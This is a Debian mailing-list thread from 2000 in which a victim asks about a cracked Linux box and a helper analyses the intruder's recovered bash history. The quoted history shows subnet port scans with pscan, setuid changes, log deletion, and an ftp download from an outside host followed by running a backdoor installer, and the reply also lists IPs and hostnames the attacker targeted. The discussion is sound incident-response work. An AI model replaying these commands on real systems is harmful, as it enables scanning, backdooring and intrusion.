Re: bash_history from Cracked Computer

To: <will@pinncomp.net>, <debian-user@lists.debian.org>
Subject: Re: bash_history from Cracked Computer
From: "Dzuy M. Nguyen" <linux_dzuy@hotmail.com>
Date: Tue, 2 May 2000 22:58:50 -0700
Message-id: <[🔎] 20000503055555.56420.qmail@hotmail.com>
References: <[🔎] 015201bfb48f$1ff77fa0$e2e4cbd1@dociss> <[🔎] 390F87BC.A2E399B6@pinncomp.net>

This linux box was plugged into the same LAN as our company NT Network.
It wasn't setup to access the NT Network or be involved in it.  It just
get's
it's TCP/IP signal from the LAN.

My question is could this cracker get access to our NT Network from this
linux box?  Could he have scanned the ports of the computers physically
connected on this LAN?  Should I be concerned with the security of the
whole office now?

----- Original Message -----
From: w trillich <will@pinncomp.net>
To: <debian-user@lists.debian.org>
Sent: Tuesday, May 02, 2000 6:58 PM
Subject: Re: bash_history from Cracked Computer


> if you run updatedb via cron (or run it from the shell by hand
> recently) it'll tell you if you have any of the evil files
> on your computer:
> locate pscan
> locate wuftp
> locate bnc2
> locate .shit
> locate anatomy
> locate kod
> locate '/b$'
> if you find any source files (*.c or *.pl) consider finding a
> debian guru to hand them to in case this kind of thing can be
> snuffed in the future. might help, you never know.
>
>
> here's my run thru the command history...
>
> >cd /
> >cd home
> >cd .dead
> >mkdir .dead
> >cd .dead
>
> somehow, your invader transferred some files here into
> the /home/.dead/ at this point. must've used his own
> ftp client, meaning he used your server--on my debian
> box the FTP transfers are logged in
>
> /var/log/xferlog
>
> see if you've still got yours. it might help.
>
> >cc anatomy.c -o anatomy
> >cc kod.c -o kofd
>
> i'd guess that 'anatomy' scans your directory tree
> and reports it back to the IP supplied as its
> command-line argument. or it may copy everything.
> maybe it scans the structure of the remote site.
> don't know. (you may still have the source code;
> if so, it might be helpful to hand it off to
> some of the C++ gurus around here so they can
> wedge it out of existence...)
>
> >cp kofd kod
> >rm kofd
>
> hmm! he never directly called kod, but some of the other
> programs may have.
>
> >cd home
> >cd httpd
> >cd icons
> >cd small
> >cd .shit
>
> looks like cut & paste, and maybe the last two didn't take.
>
> >mkdir small
> >cd small
> >mkdir .shit
> >cd .shit
>
> so i guess he's now at /home/httpd/icons/small/.shit
>
> >who
>
> unless there's a logout and login to another directory,
> more files were transferred here somehow.
>
> >chmod 777 *
> >chmod +s *
> >chmod 666 *
> >chmod 777 *
> >./pscan
> >./b
> >./pscan 167.64 111
>
> and it looks like PSCAN does a whole zone at a time.
> to what end, i don't know.
>
> down a bit, there's
>
> >./pscan 198.138 111
> >cat wuftp.log
> >rm wuftp.log
> >./pscan 198.59 111
> >cat wuftp.log
>
> so the PSCAN program creates "wuftp.log" i guess.
>
> of course, he zapped it before checking out.
> i'd bet it was in home/httpd/icons/small/.shit/
> along with some other files... may still be there.
>
> seemed to run the PSCAN on an ip net range, then check
> the wuftp log file, apparently to get other IP ranges
> to scan. ?
>
> (you might try seeing if there's any left on the system.
> may be informative.)
>
>
> now THIS part i would consider very bad news:
>
> >ftp columbia.digiweb.com
> [obviously transferring linux kernel here]
> >tar -zxvf linux.tar.gz
> >cd .bd
> >./install
>
> (i know, it's all bad news, but some is badder than others.)
>
> there's also a
> >telnet 198.150.93.205
>
> which reports as nonexistent just now, so it's probably a
> transient or dynamically-allocated ppp-like address.
>
> ===
>
> to find the where the IP's are he/she was interested in,
> (in case it helps any, or you want to contact their
> sysadmins) i did this in tcsh:
>
> % grep anatomy bash_history.txt | cut -f2 "-d "
> 216.209.196.154
> 216.209.205.68
> 216.209.207.150
> 212.1.128.61
> 212.1.128.61
>
> % foreach x(`!!`)
> foreach x ( `grep anatomy bash_history.txt | cut -f2 "-d "` )
> foreach? nslookup $x
> foreach? end
>
> Name:    HSE-Montreal-ppp33164.qc.sympatico.ca
> Address:  216.209.196.154
>
> Name:    HSE-Montreal-ppp35364.qc.sympatico.ca
> Address:  216.209.205.68
>
> Name:    HSE-Quebec-City-ppp35954.qc.sympatico.ca
> Address:  216.209.207.150
>
> Name:    cache-1.www.telinco.net
> Address:  212.1.128.61
>
> Name:    cache-1.www.telinco.net
> Address:  212.1.128.61
>
>
>
> maybe he/she had some friends in canada...?
>
>
>
> and for the "./b" program:
> foreach x ( `grep /b bash_history.txt | cut -f2 "-d " | sort | uniq` )
> foreach? nslookup $x >> bash_crack
> foreach? end
> *** localhost can't find 156.26.120.34: Non-existent host/domain
> *** localhost can't find 192.203.80.144: Non-existent host/domain
> *** localhost can't find 198.150.93.205: Non-existent host/domain
> *** localhost can't find 198.247.5.164: Non-existent host/domain
> *** localhost can't find 204.116.202.5: Non-existent host/domain
> *** localhost can't find 204.185.91.12: Non-existent host/domain
> *** localhost can't find 206.252.255.42: Non-existent host/domain
> *** localhost can't find 208.135.205.67: Non-existent host/domain
> *** localhost can't find e150.135.112.129: Non-existent host/domain
>
> Name:    netman.net.okstate.edu
> Address:  139.78.100.200
>
> Name:    www.safarir.com
> Address:  142.169.8.215
>
> Name:    midian.arc.nasa.gov
> Address:  143.232.55.1
>
> Name:    Westgate-AStar-OC3.Telcom.Arizona.EDU
> Address:  150.135.112.129
>
> Name:    bccs.sunybroome.edu
> Address:  192.203.130.28
>
> Name:    amber.inr.ac.ru
> Address:  192.203.80.142
>
> Name:    photon.inr.ruhep.ru
> Address:  192.203.80.149
>
> Name:    Galahad.Camelot.com
> Address:  192.55.203.135
>
> Name:    atmr-ulcc.lmn.net.uk
> Address:  194.83.100.85
>
> Name:    surw.chel.su
> Address:  195.54.2.162
>
> Name:    gw.daily.ru
> Address:  195.54.221.21
>
> Name:    tisa.alias.ru
> Address:  195.54.29.7
>
> Name:    optima.mgn.chel.su
> Address:  195.54.3.134
>
> Name:    ocotillo.sfps.k12.nm.us
> Address:  198.59.112.9
>
> Name:    hebi.swcp.com
> Address:  198.59.115.35
>
> Name:    brahe.phys.unm.edu
> Address:  198.59.169.11
>
> Name:    rcde19.arc.unm.edu
> Address:  198.59.173.186
>
> Name:    uofr-vbns1.nysernet.net
> Address:  199.109.4.21
>
> Name:    ls1010.nswrno.net.au
> Address:  203.15.123.146
>
> Name:    dsl.three.lorettotel.net
> Address:  204.116.104.205
>
> Name:    dslhp-100.dsl.nstelco.com
> Address:  204.116.30.166
>
> Name:    www.centralia.k12.mo.us
> Address:  204.185.56.250
>
> Name:    pagis.kings.edu
> Address:  205.238.205.10
>
> Name:    svcr-adsl-205-238-238-112.epix.net
> Address:  205.238.238.112
>
> Name:    alborada-119.pangeatech.primenet.com
> Address:  206.132.219.119
>
> Name:    alborada-170.pangeatech.primenet.com
> Address:  206.132.219.170
>
> Name:    reserved-34-52.cybercowboys.com
> Address:  206.132.34.52
>
> Name:    t1-t3-dsl.com
> Address:  216.156.219.216
>
> Name:    www.cqhost.com
> Address:  216.167.50.150
>
> Name:    telesync.com
> Address:  207.69.134.42
> Aliases:  www.telesync.com
>
> ===
>
> sorry this happened! hopefully your troubles can help us all
> avoid it in the future... do you have any idea how they originally
> got in?
>
>
> --
> Unsubscribe?  mail -s unsubscribe debian-user-request@lists.debian.org <
/dev/null
>
>

Reply to:

Follow-Ups:
- Re: bash_history from Cracked Computer
  - From: Matthew Dalton <matthewd@research.canon.com.au>

References:
- bash_history from Cracked Computer
  - From: "Dzuy M. Nguyen" <dzuy@pacificdentalcare.com>
- Re: bash_history from Cracked Computer
  - From: w trillich <will@pinncomp.net>

Prev by Date: CDE for Linux?
Next by Date: Re: bash_history from Cracked Computer
Previous by thread: Re: bash_history from Cracked Computer
Next by thread: Re: bash_history from Cracked Computer
Index(es):
- Date
- Thread